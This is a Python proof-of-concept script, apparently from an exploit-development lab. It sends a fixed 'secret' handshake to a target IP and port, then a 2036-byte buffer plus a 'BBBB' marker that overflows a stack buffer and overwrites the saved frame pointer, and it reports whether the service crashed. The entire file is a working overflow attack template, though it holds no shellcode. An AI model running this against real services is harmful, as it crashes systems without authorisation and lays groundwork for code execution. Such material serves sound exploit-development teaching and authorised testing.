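#!/usr/bin/python
"""Two-stage stack-overflow proof-of-concept template.

Stage one sends the fixed ``secret`` handshake that moves the target into
its second recv().  Stage two sends an oversized buffer that runs past
``acReadBuffer``, across three 4-byte locals, and onto the saved EBP.

Usage: template.py IP PORT

Only point this at hosts you are authorised to test.

Changes versus the bare template:
  * the socket is always closed (try/finally) instead of leaking;
  * recv() has a timeout, because a successfully smashed server often
    just stops answering rather than resetting the connection, which left
    the original hanging forever on its last recv();
  * the server's reply is printed with repr() so control bytes from a
    hostile or confused target cannot reach the terminal;
  * payload offsets live in one place and can be overridden.
"""
import socket, sys, struct

# Frame layout assumed by the original author (taken from its comments;
# not verifiable from this file alone):
#   acReadBuffer                  2024 bytes
#   nReadBytes, nSentBytes, nTemp 3 * 4 bytes
#   saved EBP                     4 bytes
BUFFER_SIZE = 2024
LOCALS_SIZE = 12
EBP_MARKER = b"B" * 4

# Seconds to wait on any recv()/connect() before giving up.
RECV_TIMEOUT = 5.0


def build_overflow_payload(buffer_size=BUFFER_SIZE, locals_size=LOCALS_SIZE,
                           saved_ebp=EBP_MARKER):
    """Return the stage-two payload as bytes.

    ``buffer_size`` bytes of ``A`` fill acReadBuffer, ``locals_size`` more
    ``A`` bytes cover the locals between it and the frame pointer, and
    ``saved_ebp`` lands on the pushed EBP.  Defaults reproduce the
    original 2024 + 12 + ``BBBB`` layout; the parameters exist so the same
    template can be re-pointed at other offsets.

    NOTE(review): the template stops at the saved EBP.  On a conventional
    x86 frame the return address is the next 4 bytes, but nothing here
    confirms that for this target -- extend ``saved_ebp`` only once the
    offset is verified in a debugger.

    Raises:
        ValueError: if either size is negative or ``saved_ebp`` is not
            bytes.
    """
    if buffer_size < 0 or locals_size < 0:
        raise ValueError("buffer_size and locals_size must be non-negative")
    if not isinstance(saved_ebp, bytes):
        raise ValueError("saved_ebp must be a bytes object")
    return b"A" * buffer_size + b"A" * locals_size + saved_ebp


def main(argv):
    """Connect to argv[1]:argv[2], run both stages, and report what came back.

    Returns the process exit code: 0 after both stages were sent, -1 on a
    usage error (mirroring the original ``sys.exit(-1)``).
    """
    if len(argv) != 3:
        print("template.py IP PORT")
        return -1
    host = argv[1]
    try:
        port = int(argv[2])
    except ValueError:
        # The original let int() raise a traceback here.
        print("template.py IP PORT  (PORT must be an integer)")
        return -1

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.settimeout(RECV_TIMEOUT)
        sock.connect((host, port))

        # Stage one: the handshake that gets the target into its second
        # recv().  The trailing NUL is deliberate -- keep the bytes exact.
        sock.sendall(b"secret\n\x00")
        data = sock.recv(1024)
        # repr(): never echo raw bytes from the target to the terminal.
        print("Sent 'secret' to server, got {0!r}".format(data))

        # Stage two: the overflow itself.
        payload = build_overflow_payload()
        sock.sendall(payload)
        print("Sent {0} bytes to server".format(len(payload)))
        try:
            data = sock.recv(1024)
        except socket.timeout:
            print("No reply within {0}s (target may have crashed)".format(RECV_TIMEOUT))
        except socket.error as exc:
            # A reset here is the usual sign the process died on the smash.
            print("Connection dropped after overflow: {0}".format(exc))
        else:
            print("Got {0!r} after overflow".format(data))
    finally:
        sock.close()
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))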